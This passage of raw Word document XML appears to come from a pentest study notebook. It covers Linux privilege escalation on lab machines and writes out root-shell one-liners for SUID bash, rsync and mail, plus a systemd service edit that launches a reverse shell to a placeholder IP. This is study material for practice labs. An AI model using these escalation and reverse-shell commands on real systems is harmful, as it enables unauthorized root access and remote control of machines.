      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You should see /bin/bash have SUID bit set</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FBD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1439"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/bash -p</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FBE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FBF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FC0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_g748qesdz6k1" w:id="274"/>
      <w:bookmarkEnd w:id="274"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/rsync</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FC1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FC2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From the </w:t>
      </w:r>
      <w:hyperlink r:id="rId683">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Zab</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FC3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FC4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3338513" cy="1457485"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="102" name="image109.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image109.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId684"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3338513" cy="1457485"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FC5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FC6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Simply run the one-liner from GTFOBins!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="343"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo rsync -e 'sh -c "sh 0&lt;&amp;2 1&gt;&amp;2"' 127.0.0.1:/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FC8">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FC9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FCA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qnmqme7yc5fp" w:id="275"/>
      <w:bookmarkEnd w:id="275"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/systemctl restart spiderbackup.service</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/systemctl daemon-reload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FCB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From the </w:t>
      </w:r>
      <w:hyperlink r:id="rId685">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Spidersociety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FCC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FCD">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1041400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="72" name="image70.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image70.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId68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FCE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1482"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/systemctl daemon-reload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FCF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1482"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/systemctl restart spiderbackup.service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FD0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FD1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FD2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1409700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="19" name="image18.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image18.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId68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FD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">linPEAS found two spiderbackup.service files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FD4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FD5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="736600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="263" name="image252.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image252.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId688"/>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1FD6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1034"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">One of them (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/systemd/system/spiderbackup.service</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) is writable. So we can try editing it </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FD7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2603500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="40" name="image31.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image31.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId68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FD8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="910"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We edit the "ExecStart" line to run a reverse shell instead of what it was doing originally</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FD9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="910"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ExecStart=/bin/bash -c 'bash -i &gt;&amp; /dev/tcp/&lt;your_ip&gt;/&lt;your_port&gt; 0&gt;&amp;1'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FDA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FDB">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then start listener and run the sudo commands:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FDC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="370"/>
        </w:numPr>
        <w:ind w:left="72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1FDD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="370"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo /bin/systemctl daemon-reload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FDE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="370"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We ran this to be safe but idk if it was necessary. Probably a good idea though since we were given that sudo priv</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FDF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="370"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo /bin/systemctl restart spiderbackup.service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FE0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FE1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FE2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_m7xrn0pphds0" w:id="276"/>
      <w:bookmarkEnd w:id="276"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/mail</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FE3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FE4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId690">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Postfish</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice they had sudo privs for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/mail *</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FE5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1168400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="172" name="image169.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image169.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId691"/>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FE6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FE7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And to exploit it, use the exploit from GTFOBins:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FE8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1230"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo /usr/bin/mail --exec='!/bin/bash'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FE9">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FEA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FEB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_e3039p6o4jqn" w:id="277"/>
      <w:bookmarkEnd w:id="277"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/docker</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001FEC">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId692">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SkillForce</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
